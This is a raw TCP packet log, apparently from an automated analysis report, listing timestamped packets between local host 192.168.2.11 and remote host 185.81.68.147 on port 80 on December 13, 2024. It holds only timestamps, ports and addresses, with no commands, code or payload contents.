                                                                                                                                                                                                Dec 13, 2024 08:20:08.451806068 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.451848030 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.452687025 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.452723026 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.452752113 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.452785969 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.453674078 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.453715086 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.453742981 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.453777075 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.454545975 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.454585075 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.454642057 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.454675913 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.455537081 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.455579996 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.455642939 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.455681086 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.456497908 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.456552982 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.456595898 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.456631899 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.457495928 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.457535028 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.457587957 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.457623959 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.458482027 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.458523989 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.458548069 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.458587885 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.459403038 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.459445953 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.459517956 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.459553003 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.460437059 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.460485935 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.460529089 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.460566044 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.461397886 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.461436033 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.461512089 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.461555958 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.462364912 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.462409019 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.462476015 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.462522030 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.463381052 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.463427067 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.463480949 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.463529110 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.464351892 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.464396954 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.464426994 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.464464903 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.465336084 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.465364933 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.465378046 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.465403080 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.466312885 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.466361046 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.466403961 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.466439009 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.467297077 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.467344046 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.467396975 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.467432976 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.468316078 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.468390942 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.468408108 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.468456030 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.469245911 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.469288111 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.469367981 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.469403982 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.470247984 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.470290899 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.470345974 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.470382929 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.471250057 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.471295118 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.471343040 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.471381903 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.472239017 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.472295046 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.472311974 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.472358942 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.473258018 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.473303080 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.473320007 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.473356962 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.474200964 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.474251986 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.474314928 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.474350929 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.475189924 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.475239038 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.475368977 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.475405931 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.482017994 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.482074022 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.482093096 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.482129097 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.482429028 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.482470036 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.482531071 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.482568979 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.483426094 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.483464956 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.483527899 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.483568907 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.484424114 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.484466076 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.484555960 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.484592915 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.485371113 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.485411882 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.485471964 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.485516071 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.486365080 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.486413002 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.486459017 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.486495018 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.487391949 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.487428904 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.487433910 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.487463951 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.622730970 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.622785091 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.622836113 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.622874975 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.623231888 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.623267889 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.623374939 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.623410940 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.624201059 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.624249935 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.624310970 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.624346018 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.625209093 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.625242949 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.625365973 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.625406981 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.626174927 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.626215935 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.626312971 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.626641035 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.627260923 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.627329111 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.627391100 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.627432108 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.628139973 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.628184080 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.628377914 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.628426075 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.629127979 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.629173040 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.629332066 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.629384041 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.630129099 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.630181074 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.630213976 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.630256891 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.631114006 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.631165981 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.631196976 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.631237984 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.632097006 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.632142067 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.632153988 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.632181883 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.633141041 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.633193970 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.633213997 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.633266926 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.634012938 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.634057999 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.634150982 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.634196043 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.635011911 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.635065079 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.635078907 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.635121107 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.635991096 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.636040926 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.636076927 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.636122942 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.636961937 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.637032032 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.637063980 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.637109041 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.637976885 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.638017893 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.638053894 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.638098955 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.638947010 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.639003038 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.639091969 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.639134884 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.639899969 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.639946938 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.640013933 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.640055895 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.640899897 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.640945911 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.640994072 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.641047955 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.641896009 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.641942024 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.642039061 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.642083883 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.642889023 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.642929077 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.643009901 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.643045902 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.643842936 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.643887997 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.643954039 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.643996000 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.644819975 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.644870043 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.644948006 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.644994974 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.645776987 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.645819902 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.645855904 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.645895004 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.646766901 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.646814108 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.646881104 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.646930933 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.647790909 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.647836924 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.647891045 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.647933006 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.648729086 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.648777962 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.648874998 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.648917913 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.649744034 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.649796009 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.649827957 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.649868965 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.650719881 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.650763988 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.650892973 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.650934935 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.651765108 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.651808977 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.651839018 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.651882887 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.652714968 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.652779102 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.652812958 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.652862072 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.653623104 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.653676987 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.653712034 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.653753042 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.654597044 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.654643059 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.654678106 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.654716015 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.655610085 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.655653954 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.655705929 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.655751944 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.656584978 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.656630039 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.656699896 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.656742096 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.657552004 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.657608032 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.657668114 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.657712936 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.658529043 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.658574104 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.658711910 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.658756971 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.659517050 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.659554958 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.660106897 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.660156965 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.660553932 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.660598993 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.660685062 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.660732031 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.661487103 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.661540985 CET4993880192.168.2.11185.81.68.147
